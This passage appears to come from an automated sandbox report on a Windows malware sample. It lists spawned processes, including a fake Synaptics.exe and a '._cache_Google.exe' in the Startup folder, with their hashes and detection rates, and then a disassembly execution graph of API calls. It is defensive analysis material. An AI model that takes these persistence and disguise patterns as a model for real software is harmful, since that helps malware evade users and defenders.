                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                                    MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                    Start time:05:51:27
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                                                                                    Imagebase:0x8a0000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                    Start time:05:51:35
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                                                                                    Imagebase:0x8a0000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                    Start time:05:51:44
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:2'203'648 bytes
                                                                                                                                                                                    MD5 hash:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                    Start time:05:51:44
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                    Start time:05:51:45
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                                    MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                    Start time:05:51:46
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                    Imagebase:0x780000
                                                                                                                                                                                    File size:53'161'064 bytes
                                                                                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                    Start time:05:51:57
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                    Start time:05:52:00
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Imagebase:0x8a0000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                    Start time:05:52:38
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 12388
                                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:4.2%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:8.9%
                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                      Total number of Limit Nodes:36
                                                                                                                                                                                      execution_graph 107367 90e834 107370 912b40 107367->107370 107369 90e840 107371 912b98 107370->107371 107437 912bfc __NMSG_WRITE _memmove 107370->107437 107372 912bbf 107371->107372 107374 977cf3 107371->107374 107375 9133cb 107371->107375 107445 92010a 107372->107445 107376 977cf8 107374->107376 107384 977d15 107374->107384 107472 905577 420 API calls Mailbox 107375->107472 107376->107372 107379 977d01 107376->107379 107377 912be8 107380 92010a 48 API calls 107377->107380 107495 95d443 420 API calls Mailbox 107379->107495 107380->107437 107381 977d38 107497 94d520 86 API calls 4 library calls 107381->107497 107384->107381 107496 95d8ff 420 API calls 2 library calls 107384->107496 107385 91366d 107526 94d520 86 API calls 4 library calls 107385->107526 107388 978518 107388->107369 107389 9784df 107525 94d520 86 API calls 4 library calls 107389->107525 107390 9783d1 107514 94d520 86 API calls 4 library calls 107390->107514 107394 9783eb 107515 94d520 86 API calls 4 library calls 107394->107515 107395 977e43 107498 94d520 86 API calls 4 library calls 107395->107498 107397 978434 107517 94d520 86 API calls 4 library calls 107397->107517 107399 92010a 48 API calls 107399->107437 107402 97844e 107518 94d520 86 API calls 4 library calls 107402->107518 107403 90d2d2 53 API calls 107403->107437 107404 90d349 53 API calls 107404->107437 107405 921b2a 52 API calls __cinit 107405->107437 107408 91345e 107516 94d520 86 API calls 4 library calls 107408->107516 107409 90d3d2 48 API calls 107409->107437 107410 9784b5 107523 94d520 86 API calls 4 library calls 107410->107523 107414 9784c8 107524 94d520 86 API calls 4 library calls 107414->107524 107418 9781d7 107511 95d154 48 API calls 107418->107511 107419 90fa40 420 API calls 107419->107437 107422 913637 107519 94d520 86 API calls 4 library calls 107422->107519 107423 9784a4 107522 94d520 86 API calls 4 library calls 107423->107522 107424 913157 107424->107369 107428 90c935 48 API calls 107428->107437 107429 90cdb4 48 API calls 107429->107437 107430 97822c 107513 90346e 48 API calls 107430->107513 107432 97826c 107432->107424 107521 94d520 86 API calls 4 library calls 107432->107521 107436 978259 107439 903320 48 API calls 107436->107439 107437->107385 107437->107389 107437->107390 107437->107394 107437->107395 107437->107397 107437->107399 107437->107402 107437->107403 107437->107404 107437->107405 107437->107408 107437->107409 107437->107410 107437->107414 107437->107418 107437->107419 107437->107422 107437->107423 107437->107424 107437->107428 107437->107429 107437->107432 107442 93a599 InterlockedDecrement 107437->107442 107454 90ca8e 107437->107454 107468 90d380 107437->107468 107473 907e53 107437->107473 107482 90346e 48 API calls 107437->107482 107483 903320 107437->107483 107494 90203a 420 API calls 107437->107494 107499 90d89e 107437->107499 107509 95d154 48 API calls 107437->107509 107510 94ab1c 50 API calls 107437->107510 107438 9781ea 107438->107430 107512 95d154 48 API calls 107438->107512 107441 978261 107439->107441 107440 978236 107440->107422 107440->107436 107441->107432 107443 978478 107441->107443 107442->107437 107520 94d520 86 API calls 4 library calls 107443->107520 107447 920112 __calloc_impl 107445->107447 107448 92012c 107447->107448 107449 92012e std::exception::exception 107447->107449 107527 9245ec 107447->107527 107448->107377 107541 927495 RaiseException 107449->107541 107451 920158 107542 9273cb 47 API calls _free 107451->107542 107453 92016a 107453->107377 107455 90cad0 107454->107455 107456 90ca9a 107454->107456 107457 90cae3 107455->107457 107458 90cad9 107455->107458 107461 92010a 48 API calls 107456->107461 107553 90c4cd 107457->107553 107459 907e53 48 API calls 107458->107459 107465 90cac6 107459->107465 107462 90caad 107461->107462 107463 974f11 107462->107463 107464 90cab8 107462->107464 107463->107465 107557 90d3d2 107463->107557 107464->107465 107549 90caee 107464->107549 107465->107437 107469 90d38b 107468->107469 107470 90d3b4 107469->107470 107562 90d772 55 API calls 107469->107562 107470->107437 107472->107424 107474 907ecf 107473->107474 107476 907e5f __NMSG_WRITE 107473->107476 107567 90a2fb 107474->107567 107477 907ec7 107476->107477 107478 907e7b 107476->107478 107566 907eda 48 API calls 107477->107566 107563 90a6f8 107478->107563 107481 907e85 _memmove 107481->107437 107482->107437 107484 903334 107483->107484 107486 903339 Mailbox 107483->107486 107575 90342c 48 API calls 107484->107575 107491 903347 107486->107491 107576 90346e 48 API calls 107486->107576 107488 92010a 48 API calls 107490 9033d8 107488->107490 107489 903422 107489->107437 107492 92010a 48 API calls 107490->107492 107491->107488 107491->107489 107493 9033e3 107492->107493 107493->107437 107493->107493 107494->107437 107495->107424 107496->107381 107497->107437 107498->107424 107500 90d8ac 107499->107500 107507 90d8db Mailbox 107499->107507 107501 90d8ff 107500->107501 107503 90d8b2 Mailbox 107500->107503 107577 90c935 107501->107577 107504 90d8c7 107503->107504 107505 974e9b 107503->107505 107506 974e72 VariantClear 107504->107506 107504->107507 107505->107507 107581 93a599 InterlockedDecrement 107505->107581 107506->107507 107507->107437 107509->107437 107510->107437 107511->107438 107512->107438 107513->107440 107514->107394 107515->107424 107516->107424 107517->107402 107518->107424 107519->107424 107520->107424 107521->107424 107522->107424 107523->107424 107524->107424 107525->107424 107526->107388 107528 924667 __calloc_impl 107527->107528 107536 9245f8 __calloc_impl 107527->107536 107548 92889e 47 API calls __getptd_noexit 107528->107548 107531 92462b RtlAllocateHeap 107532 92465f 107531->107532 107531->107536 107532->107447 107534 924603 107534->107536 107543 928e52 47 API calls __NMSG_WRITE 107534->107543 107544 928eb2 47 API calls 5 library calls 107534->107544 107545 921d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 107534->107545 107535 924653 107546 92889e 47 API calls __getptd_noexit 107535->107546 107536->107531 107536->107534 107536->107535 107539 924651 107536->107539 107547 92889e 47 API calls __getptd_noexit 107539->107547 107541->107451 107542->107453 107543->107534 107544->107534 107546->107539 107547->107532 107548->107532 107550 90cafd __NMSG_WRITE _memmove 107549->107550 107551 92010a 48 API calls 107550->107551 107552 90cb3b 107551->107552 107552->107465 107554 90c4e7 107553->107554 107555 90c4da 107553->107555 107556 92010a 48 API calls 107554->107556 107555->107465 107556->107555 107558 92010a 48 API calls 107557->107558 107559 90d3f3 107558->107559 107560 92010a 48 API calls 107559->107560 107561 90d401 107560->107561 107561->107465 107562->107470 107564 92010a 48 API calls 107563->107564 107565 90a702 107564->107565 107565->107481 107566->107481 107568 90a309 107567->107568 107570 90a321 _memmove 107567->107570 107568->107570 107571 90b8a7 107568->107571 107570->107481 107572 90b8ba 107571->107572 107574 90b8b7 _memmove 107571->107574 107573 92010a 48 API calls 107572->107573 107573->107574 107574->107570 107575->107486 107576->107491 107578 90c940 107577->107578 107579 90c948 107577->107579 107582 90d805 107578->107582 107579->107507 107581->107507 107584 90d828 _memmove 107582->107584 107585 90d815 107582->107585 107583 92010a 48 API calls 107583->107584 107584->107579 107585->107583 107585->107584 107586 910ff7 108153 91e016 107586->108153 107588 91100d 108162 91e08f 107588->108162 107593 91105e 107602 90c935 48 API calls 107593->107602 107594 910dee 107599 90d89e 50 API calls 107594->107599 107595 90c935 48 API calls 107618 90fad8 Mailbox _memmove 107595->107618 107597 911063 108182 94d520 86 API calls 4 library calls 107597->108182 107598 910dfa 107603 90d89e 50 API calls 107598->107603 107599->107598 107600 97b772 108184 94d520 86 API calls 4 library calls 107600->108184 107601 910119 108183 94d520 86 API calls 4 library calls 107601->108183 107615 90fbf1 Mailbox 107602->107615 107605 910e83 107603->107605 107609 90caee 48 API calls 107605->107609 107606 90d3d2 48 API calls 107606->107618 107608 97b7d2 107623 9110f1 Mailbox 107609->107623 107610 921b2a 52 API calls __cinit 107610->107618 107612 91103d 107612->107615 108181 94d520 86 API calls 4 library calls 107612->108181 107616 92010a 48 API calls 107616->107618 107618->107593 107618->107594 107618->107595 107618->107597 107618->107598 107618->107600 107618->107601 107618->107605 107618->107606 107618->107610 107618->107612 107618->107615 107618->107616 107621 93a599 InterlockedDecrement 107618->107621 107622 97b583 107618->107622 107618->107623 107644 90f6d0 107618->107644 107716 90fa40 107618->107716 107773 95013f 107618->107773 107786 959122 107618->107786 107800 9630ad 107618->107800 107854 95936f 107618->107854 107882 9617aa 107618->107882 107887 96798d 107618->107887 107892 96804e 107618->107892 107906 95b74b VariantInit 107618->107906 107947 91ef0d 107618->107947 107990 91f03e 107618->107990 107993 91dd84 107618->107993 107996 960bfa 107618->107996 107999 958065 GetCursorPos GetForegroundWindow 107618->107999 108013 961f19 107618->108013 108016 9610e5 107618->108016 108022 91f461 107618->108022 108060 9050a3 107618->108060 108065 9081c6 107618->108065 108135 9592c0 107618->108135 108174 911620 59 API calls Mailbox 107618->108174 108175 95ee52 82 API calls 2 library calls 107618->108175 108176 95ef9d 90 API calls Mailbox 107618->108176 108177 94b020 48 API calls 107618->108177 108178 95e713 420 API calls Mailbox 107618->108178 107621->107618 108179 94d520 86 API calls 4 library calls 107622->108179 108180 94d520 86 API calls 4 library calls 107623->108180 107645 90f708 107644->107645 107649 90f77b 107644->107649 107646 97c4d5 107645->107646 107647 90f712 107645->107647 107652 97c4f4 107646->107652 107653 97c4e2 107646->107653 107648 90f71c 107647->107648 107665 97c544 107647->107665 107658 97c6a4 107648->107658 107662 90f72a 107648->107662 107711 90f741 107648->107711 107651 97c253 107649->107651 107690 90f787 107649->107690 107650 90fa40 420 API calls 107650->107690 108224 94d520 86 API calls 4 library calls 107651->108224 108229 95c235 420 API calls Mailbox 107652->108229 108185 95f34f 107653->108185 107654 97c585 107666 97c5a4 107654->107666 107667 97c590 107654->107667 107661 90c935 48 API calls 107658->107661 107659 97c264 107659->107618 107660 97c507 107664 97c50b 107660->107664 107660->107711 107661->107711 107662->107711 108330 93a599 InterlockedDecrement 107662->108330 108230 94d520 86 API calls 4 library calls 107664->108230 107665->107654 107677 97c569 107665->107677 108232 95d154 48 API calls 107666->108232 107669 95f34f 420 API calls 107667->107669 107669->107711 107671 922241 48 API calls 107671->107690 107672 97c45a 107676 90c935 48 API calls 107672->107676 107674 97c7b5 107680 97c7eb 107674->107680 108352 95ef9d 90 API calls Mailbox 107674->108352 107675 97c5af 107689 97c62c 107675->107689 107701 97c5d1 107675->107701 107676->107711 108231 94d520 86 API calls 4 library calls 107677->108231 107683 90d89e 50 API calls 107680->107683 107681 90f84a 107682 97c32a 107681->107682 107695 90f854 107681->107695 108225 90342c 48 API calls 107682->108225 107712 90f770 Mailbox 107683->107712 107685 97c793 108332 9084a6 107685->108332 108257 94afce 48 API calls 107689->108257 107690->107650 107690->107671 107690->107681 107692 90f8bb 107690->107692 107699 90f9d8 107690->107699 107690->107712 107691 97c7c9 107694 9084a6 81 API calls 107691->107694 107692->107659 107692->107672 107692->107711 108226 93a599 InterlockedDecrement 107692->108226 108228 95f4df 420 API calls 107692->108228 107698 97c7d1 __NMSG_WRITE 107694->107698 108208 9114a0 107695->108208 107697 90f8ab 107697->107692 107697->107699 107698->107680 107707 90d89e 50 API calls 107698->107707 108227 94d520 86 API calls 4 library calls 107699->108227 108233 94a485 48 API calls 107701->108233 107702 97c63e 108258 91df08 48 API calls 107702->108258 107703 97c79b __NMSG_WRITE 107703->107674 107705 90d89e 50 API calls 107703->107705 107705->107674 107707->107680 107708 97c647 Mailbox 108259 94a485 48 API calls 107708->108259 107709 97c5f6 108234 9144e0 107709->108234 107711->107674 107711->107712 108331 95ee52 82 API calls 2 library calls 107711->108331 107712->107618 107714 97c663 108260 913680 107714->108260 107717 90fa60 107716->107717 107722 90fa8e Mailbox _memmove 107716->107722 107718 92010a 48 API calls 107717->107718 107718->107722 107719 91105e 107720 90c935 48 API calls 107719->107720 107726 90fbf1 Mailbox 107720->107726 107722->107719 107724 911063 107722->107724 107725 910dee 107722->107725 107722->107726 107728 910dfa 107722->107728 107730 97b772 107722->107730 107733 90c935 48 API calls 107722->107733 107734 90f6d0 420 API calls 107722->107734 107735 90d3d2 48 API calls 107722->107735 107737 910119 107722->107737 107739 910e83 107722->107739 107740 921b2a 52 API calls __cinit 107722->107740 107745 911230 107722->107745 107746 92010a 48 API calls 107722->107746 107747 90fa40 420 API calls 107722->107747 107750 93a599 InterlockedDecrement 107722->107750 107751 97b583 107722->107751 107753 9110f1 Mailbox 107722->107753 107754 95013f 87 API calls 107722->107754 107755 960bfa 129 API calls 107722->107755 107756 91f03e 2 API calls 107722->107756 107757 961f19 134 API calls 107722->107757 107758 958065 55 API calls 107722->107758 107759 91f461 98 API calls 107722->107759 107760 9610e5 82 API calls 107722->107760 107761 9050a3 49 API calls 107722->107761 107762 91dd84 3 API calls 107722->107762 107763 9592c0 88 API calls 107722->107763 107764 9081c6 85 API calls 107722->107764 107765 959122 91 API calls 107722->107765 107766 96804e 113 API calls 107722->107766 107767 95936f 56 API calls 107722->107767 107768 9630ad 93 API calls 107722->107768 107769 96798d 109 API calls 107722->107769 107770 9617aa 87 API calls 107722->107770 107771 91ef0d 94 API calls 107722->107771 107772 95b74b 420 API calls 107722->107772 109193 911620 59 API calls Mailbox 107722->109193 109194 95ee52 82 API calls 2 library calls 107722->109194 109195 95ef9d 90 API calls Mailbox 107722->109195 109196 94b020 48 API calls 107722->109196 109197 95e713 420 API calls Mailbox 107722->109197 109201 94d520 86 API calls 4 library calls 107724->109201 107729 90d89e 50 API calls 107725->107729 107726->107618 107732 90d89e 50 API calls 107728->107732 107729->107728 109203 94d520 86 API calls 4 library calls 107730->109203 107732->107739 107733->107722 107734->107722 107735->107722 109202 94d520 86 API calls 4 library calls 107737->109202 107738 97b7d2 107741 90caee 48 API calls 107739->107741 107740->107722 107741->107753 107745->107726 109200 94d520 86 API calls 4 library calls 107745->109200 107746->107722 107747->107722 107750->107722 109198 94d520 86 API calls 4 library calls 107751->109198 109199 94d520 86 API calls 4 library calls 107753->109199 107754->107722 107755->107722 107756->107722 107757->107722 107758->107722 107759->107722 107760->107722 107761->107722 107762->107722 107763->107722 107764->107722 107765->107722 107766->107722 107767->107722 107768->107722 107769->107722 107770->107722 107771->107722 107772->107722 107774 950157 107773->107774 107775 95015e 107773->107775 107777 9084a6 81 API calls 107774->107777 107776 9084a6 81 API calls 107775->107776 107776->107774 107778 95017c 107777->107778 109204 9476db GetFileVersionInfoSizeW 107778->109204 107780 95018d 107781 9501a3 _wcscmp 107780->107781 107782 950192 107780->107782 107785 90ca8e 48 API calls 107781->107785 107783 90ca8e 48 API calls 107782->107783 107784 9501a1 107783->107784 107784->107618 107785->107784 107787 9084a6 81 API calls 107786->107787 107788 95913f 107787->107788 107789 90cdb4 48 API calls 107788->107789 107790 959149 107789->107790 109220 95acd3 107790->109220 107792 959156 107793 95915a socket 107792->107793 107798 959182 107792->107798 107794 959184 connect 107793->107794 107795 95916d WSAGetLastError 107793->107795 107796 9591a3 WSAGetLastError 107794->107796 107794->107798 107795->107798 109226 94d7e4 107796->109226 107798->107618 107799 9591b8 closesocket 107799->107798 107801 90ca8e 48 API calls 107800->107801 107802 9630ca 107801->107802 107803 90d3d2 48 API calls 107802->107803 107804 9630d3 107803->107804 107805 90d3d2 48 API calls 107804->107805 107806 9630dc 107805->107806 107807 90d3d2 48 API calls 107806->107807 107808 9630e5 107807->107808 107809 9084a6 81 API calls 107808->107809 107810 9630f4 107809->107810 107811 963d7b 48 API calls 107810->107811 107812 963128 107811->107812 107813 963af7 49 API calls 107812->107813 107814 963159 107813->107814 107815 96319c RegOpenKeyExW 107814->107815 107816 963172 RegConnectRegistryW 107814->107816 107825 96315d Mailbox 107814->107825 107818 9631f7 107815->107818 107819 9631c5 107815->107819 107816->107815 107816->107825 107820 9084a6 81 API calls 107818->107820 107822 9631d9 RegCloseKey 107819->107822 107819->107825 107821 963207 RegQueryValueExW 107820->107821 107823 963229 107821->107823 107824 96323e 107821->107824 107822->107825 107828 9634eb RegCloseKey 107823->107828 107824->107823 107826 963265 107824->107826 107827 96344c 107824->107827 107825->107618 107829 96326e 107826->107829 107830 9633d9 107826->107830 107831 92010a 48 API calls 107827->107831 107828->107825 107832 9634fe RegCloseKey 107828->107832 107834 96338d 107829->107834 107835 963279 107829->107835 109241 94ad14 48 API calls _memset 107830->109241 107836 963464 107831->107836 107832->107825 107841 9084a6 81 API calls 107834->107841 107839 9632de 107835->107839 107840 96327e 107835->107840 107837 9084a6 81 API calls 107836->107837 107842 963479 RegQueryValueExW 107837->107842 107838 9633e4 107843 9084a6 81 API calls 107838->107843 107845 92010a 48 API calls 107839->107845 107840->107823 107848 9084a6 81 API calls 107840->107848 107844 9633a1 RegQueryValueExW 107841->107844 107842->107823 107853 963331 107842->107853 107847 9633f6 RegQueryValueExW 107843->107847 107844->107823 107846 9632f7 107845->107846 107849 9084a6 81 API calls 107846->107849 107847->107823 107847->107828 107850 96329f RegQueryValueExW 107848->107850 107851 96330c RegQueryValueExW 107849->107851 107850->107823 107851->107823 107851->107853 107852 90ca8e 48 API calls 107852->107823 107853->107852 107855 90cdb4 48 API calls 107854->107855 107856 95938a 107855->107856 107857 90cdb4 48 API calls 107856->107857 107858 95939a 107857->107858 107859 90ca8e 48 API calls 107858->107859 107860 9593a9 107859->107860 107861 9593c2 select 107860->107861 107878 9593ae Mailbox _memmove 107860->107878 107862 959414 WSAGetLastError 107861->107862 107863 95941f 107861->107863 107862->107878 107864 92010a 48 API calls 107863->107864 107865 959428 107864->107865 107866 904bce 48 API calls 107865->107866 107867 959432 __WSAFDIsSet 107866->107867 107868 95944a #16 107867->107868 107867->107878 107869 9594f5 WSAGetLastError 107868->107869 107870 959463 107868->107870 107869->107878 107871 95947b _strlen 107870->107871 107872 90cdb4 48 API calls 107870->107872 107870->107878 107873 9594be 107871->107873 107874 95948e 107871->107874 107872->107871 109250 94ad14 48 API calls _memset 107873->109250 109242 93e0f5 48 API calls 2 library calls 107874->109242 107877 959497 109243 95ae5a 50 API calls 107877->109243 107878->107618 107880 9594a3 109244 907bef 107880->109244 107883 9084a6 81 API calls 107882->107883 107884 9617c7 107883->107884 107885 946f5b 63 API calls 107884->107885 107886 9617d8 107885->107886 107886->107618 109251 9019ee 107887->109251 107891 9679a4 107891->107618 107893 9019ee 83 API calls 107892->107893 107894 968062 107893->107894 107895 901dce 107 API calls 107894->107895 107896 96806b 107895->107896 107897 968091 107896->107897 107898 96806f 107896->107898 107899 90d3d2 48 API calls 107897->107899 107900 90ca8e 48 API calls 107898->107900 107901 96809a 107899->107901 107905 96808f Mailbox 107900->107905 109375 93e2e8 107901->109375 107903 9680aa 107904 907bef 48 API calls 107903->107904 107904->107905 107905->107618 107907 90ca8e 48 API calls 107906->107907 107908 95b7a3 CoInitialize 107907->107908 107909 95b7ae CoUninitialize 107908->107909 107911 95b7b4 107908->107911 107909->107911 107910 95b7d5 107913 95b81b 107910->107913 107915 9084a6 81 API calls 107910->107915 107911->107910 107912 90ca8e 48 API calls 107911->107912 107912->107910 107914 9084a6 81 API calls 107913->107914 107916 95b827 107914->107916 107917 95b7ef 107915->107917 107920 95b9d3 SetErrorMode CoGetInstanceFromFile 107916->107920 107932 95b861 107916->107932 109419 93a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 107917->109419 107919 95b802 107919->107913 107921 95b807 107919->107921 107924 95ba1f CoGetObject 107920->107924 107925 95ba19 SetErrorMode 107920->107925 109420 95c235 420 API calls Mailbox 107921->109420 107923 95b8a8 GetRunningObjectTable 107926 95b8cb 107923->107926 107927 95b8b8 107923->107927 107924->107925 107929 95baa8 107924->107929 107944 95b9b1 107925->107944 109421 95c235 420 API calls Mailbox 107926->109421 107927->107926 107946 95b8ed 107927->107946 109425 95c235 420 API calls Mailbox 107929->109425 107930 95bad0 VariantClear 107930->107618 107932->107923 107937 95b89a 107932->107937 107939 90cdb4 48 API calls 107932->107939 107934 95bac2 SetErrorMode 107936 95b814 Mailbox 107934->107936 107935 95ba53 107938 95ba6f 107935->107938 109423 93ac4b 51 API calls Mailbox 107935->109423 107936->107930 107937->107923 109424 94a6f6 103 API calls 107938->109424 107942 95b88a 107939->107942 107942->107937 107943 90cdb4 48 API calls 107942->107943 107943->107937 107944->107929 107944->107935 107946->107944 109422 93ac4b 51 API calls Mailbox 107946->109422 107948 90ca8e 48 API calls 107947->107948 107949 91ef25 107948->107949 107950 91effb 107949->107950 107951 91ef3e 107949->107951 107952 92010a 48 API calls 107950->107952 109449 91f0f3 48 API calls 107951->109449 107954 91f002 107952->107954 107955 91f00e 107954->107955 109451 905080 49 API calls 107954->109451 107959 9084a6 81 API calls 107955->107959 107957 91ef73 107961 91f03e 2 API calls 107957->107961 107958 91ef4d 107958->107957 107962 976942 107958->107962 107963 90cdb4 48 API calls 107958->107963 107960 91f01c 107959->107960 107964 904bf9 56 API calls 107960->107964 107965 91ef7a 107961->107965 107962->107618 107966 976965 107963->107966 107968 91f02b 107964->107968 107969 91ef87 107965->107969 107970 976980 107965->107970 107966->107957 107967 97696d 107966->107967 107971 90cdb4 48 API calls 107967->107971 107968->107958 107972 976936 107968->107972 107974 90d3d2 48 API calls 107969->107974 107973 92010a 48 API calls 107970->107973 107971->107965 107972->107962 109452 904592 CloseHandle 107972->109452 107975 976986 107973->107975 107976 91ef8f 107974->107976 107977 97699f 107975->107977 109453 903d65 ReadFile SetFilePointerEx 107975->109453 109426 91f04e 107976->109426 107983 9769a3 _memmove 107977->107983 109454 94ad14 48 API calls _memset 107977->109454 107981 91ef9e 107981->107983 107984 907bef 48 API calls 107981->107984 107986 91efb2 Mailbox 107984->107986 107985 91eff2 107985->107618 107986->107985 107987 9050ec CloseHandle 107986->107987 107988 91efe4 107987->107988 109450 904592 CloseHandle 107988->109450 107991 91f0b5 2 API calls 107990->107991 107992 91f046 107991->107992 107992->107618 109478 91dd92 GetFileAttributesW 107993->109478 109483 95f79f 107996->109483 107998 960c0a 107998->107618 109558 956b19 107999->109558 108002 9580a5 108003 903320 48 API calls 108002->108003 108004 9580b3 108003->108004 109563 912320 50 API calls 108004->109563 108005 958102 108007 90cdb4 48 API calls 108005->108007 108012 9580f5 108005->108012 108009 95812b 108007->108009 108008 9580cf 109564 912320 50 API calls 108008->109564 108011 